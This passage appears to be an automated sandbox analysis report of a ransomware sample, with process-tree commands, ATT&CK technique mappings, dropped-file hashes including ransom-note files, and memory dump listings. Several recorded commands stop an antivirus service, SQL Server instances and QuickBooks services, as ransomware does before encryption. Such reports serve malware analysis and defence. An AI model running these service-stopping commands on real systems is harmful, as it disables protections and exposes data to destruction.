C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:5400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:5384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:3984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1⤵
PID:4684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
1⤵
PID:1204

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:11008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

File Permissions Modification

1

T1222

Modify Registry

3

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

2

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
4bee6764158395ff4b8338d85a791fec

SHA1
95a27d8fb90f9a6f1a0249024031bbd12f70a6cc

SHA256
597d2a3c92b0baadaeb50d970bef99507134d632a1926a6ac708b55c0f7af91d

SHA512
ab08040bef2fc96bd9a9c4f5f471259033641114d80bbb9f439fc9fe6b3f37ba6cb65d1a9f216739b9f0906d1bf9ee615221b058f5e04666767aa4ebf15e9927

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Filesize
2KB

MD5
3ba7dbb4ede0af8460784515c6eedf52

SHA1
b017e44311d752fd4ffe1642e44d3cc0a5f783a8

SHA256
437e29d7e40ad47e3f3be67610005fc1cc9b515778ad2898b6143fa670fb57e4

SHA512
33dcb55d05038f2d96e6820d736590453dca59c30449486510cb88f2393616fd8c58c6639fecbe0156aebb1a9d88bd699d1a679bcd84e00b3ea08970e11b0ae9

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Filesize
4KB

MD5
5b5092d4170180c338caaabcaff6ba72

SHA1
7c93ef3b4195d1cf0cfb69c66b3f91587ad6e58d

SHA256
6b9a63a13de9fe2046759a2c7ab6c3ddb42fcea9f78de029b0cd1bc9756d130e

SHA512
f9a3926344ed6292be1c53c1d3fa0669b0de4af2228b1f0910e510bb2cc3f3557ea8f7a0a84160770660278996bc18a7b19a3e451de3ba92a6e03bc02f39b0bf

Download Submit
memory/708-121-0x0000000000000000-mapping.dmp

Download
memory/744-114-0x0000000000530000-0x0000000000531000-memory.dmp

Filesize
4KB

Download
memory/744-117-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

Filesize
4KB

Download
memory/744-116-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

Filesize
4KB

Download
memory/960-120-0x0000000000000000-mapping.dmp

Download
memory/1036-130-0x0000000000000000-mapping.dmp

Download
memory/1184-138-0x0000000000000000-mapping.dmp

Download
memory/1204-144-0x0000000000000000-mapping.dmp

Download
memory/1296-131-0x0000000000000000-mapping.dmp

Download
memory/1368-122-0x0000000000000000-mapping.dmp

Download
memory/2024-128-0x0000000000000000-mapping.dmp

Download
memory/2084-123-0x0000000000000000-mapping.dmp

Download
memory/2220-136-0x0000000000000000-mapping.dmp

Download
memory/2308-119-0x0000000000000000-mapping.dmp

Download
memory/2504-126-0x0000000000000000-mapping.dmp

Download
memory/2556-143-0x0000000000000000-mapping.dmp

Download
memory/2616-137-0x0000000000000000-mapping.dmp

Download
memory/2712-132-0x0000000000000000-mapping.dmp

Download
memory/3044-125-0x0000000000000000-mapping.dmp

Download
memory/3064-133-0x0000000000000000-mapping.dmp

Download
memory/3068-135-0x0000000000000000-mapping.dmp

Download
memory/3236-139-0x0000000000000000-mapping.dmp

Download
memory/3656-124-0x0000000000000000-mapping.dmp

Download
memory/3776-118-0x0000000000000000-mapping.dmp

Download
memory/3796-127-0x0000000000000000-mapping.dmp

Download
memory/3852-142-0x0000000000000000-mapping.dmp

Download
memory/3860-141-0x0000000000000000-mapping.dmp

Download
memory/3868-140-0x0000000000000000-mapping.dmp

Download
memory/3920-134-0x0000000000000000-mapping.dmp

Download
memory/3984-180-0x0000000000000000-mapping.dmp

Download
memory/4088-129-0x0000000000000000-mapping.dmp

Download
memory/4092-145-0x0000000000000000-mapping.dmp

Download
memory/4100-146-0x0000000000000000-mapping.dmp

Download
memory/4124-147-0x0000000000000000-mapping.dmp

Download
memory/4140-148-0x0000000000000000-mapping.dmp

Download
memory/4156-181-0x0000000000000000-mapping.dmp

Download
memory/4160-149-0x0000000000000000-mapping.dmp

Download
memory/4200-150-0x0000000000000000-mapping.dmp

Download
memory/4224-151-0x0000000000000000-mapping.dmp

Download
memory/4244-152-0x0000000000000000-mapping.dmp

Download
memory/4268-153-0x0000000000000000-mapping.dmp

Download
memory/4296-154-0x0000000000000000-mapping.dmp

Download
memory/4344-155-0x0000000000000000-mapping.dmp

Download
memory/4356-156-0x0000000000000000-mapping.dmp

Download
memory/4400-157-0x0000000000000000-mapping.dmp

Download
memory/4464-158-0x0000000000000000-mapping.dmp

Download
memory/4488-159-0x0000000000000000-mapping.dmp

Download
memory/4532-160-0x0000000000000000-mapping.dmp

Download
memory/4548-161-0x0000000000000000-mapping.dmp

Download
memory/4560-162-0x0000000000000000-mapping.dmp

Download
memory/4592-163-0x0000000000000000-mapping.dmp

Download
memory/4624-164-0x0000000000000000-mapping.dmp

Download
memory/4648-165-0x0000000000000000-mapping.dmp

Download
memory/4684-166-0x0000000000000000-mapping.dmp

Download
memory/4708-167-0x0000000000000000-mapping.dmp

Download
memory/4748-168-0x0000000000000000-mapping.dmp

Download
memory/4784-169-0x0000000000000000-mapping.dmp

Download
memory/4796-170-0x0000000000000000-mapping.dmp

Download
memory/4836-171-0x0000000000000000-mapping.dmp

Download
memory/4848-172-0x0000000000000000-mapping.dmp

Download
memory/4896-173-0x0000000000000000-mapping.dmp

Download
memory/4932-174-0x0000000000000000-mapping.dmp

Download
memory/4952-175-0x0000000000000000-mapping.dmp

Download
memory/4980-176-0x0000000000000000-mapping.dmp

Download
memory/5012-177-0x0000000000000000-mapping.dmp

Download
memory/5076-178-0x0000000000000000-mapping.dmp

Download
memory/5108-179-0x0000000000000000-mapping.dmp

Download
memory/10412-187-0x00000000072C0000-0x00000000072C1000-memory.dmp

Filesize
4KB

Download
memory/10412-188-0x00000000072C2000-0x00000000072C3000-memory.dmp

Filesize
4KB

Download
memory/10412-185-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

Filesize
4KB

Download
memory/10412-186-0x0000000007900000-0x0000000007901000-memory.dmp

Filesize
4KB

Download
memory/10412-201-0x0000000008090000-0x0000000008091000-memory.dmp

Filesize
4KB

Download
memory/10412-197-0x0000000007780000-0x0000000007781000-memory.dmp

Filesize
4KB

Download
memory/10412-236-0x00000000072C3000-0x00000000072C4000-memory.dmp

Filesize
4KB

Download
memory/15676-226-0x0000000009560000-0x0000000009593000-memory.dmp

Filesize
204KB

Download
memory/15676-207-0x0000000008840000-0x0000000008841000-memory.dmp

Filesize
4KB

Download
memory/15676-205-0x00000000087F0000-0x00000000087F1000-memory.dmp

Filesize
4KB

Download
memory/15676-234-0x0000000009500000-0x0000000009501000-memory.dmp

Filesize
4KB

Download
memory/15676-203-0x0000000008020000-0x0000000008021000-memory.dmp

Filesize
4KB

Download
memory/15676-237-0x000000007E470000-0x000000007E471000-memory.dmp

Filesize
4KB

Download
memory/15676-241-0x0000000009690000-0x0000000009691000-memory.dmp

Filesize
4KB

Download
memory/15676-250-0x0000000004D63000-0x0000000004D64000-memory.dmp

Filesize
4KB

Download
memory/15676-195-0x00000000076F0000-0x00000000076F1000-memory.dmp

Filesize
4KB

Download
memory/15676-194-0x0000000004D62000-0x0000000004D63000-memory.dmp

Filesize
4KB

Download
memory/15676-193-0x0000000004D60000-0x0000000004D61000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads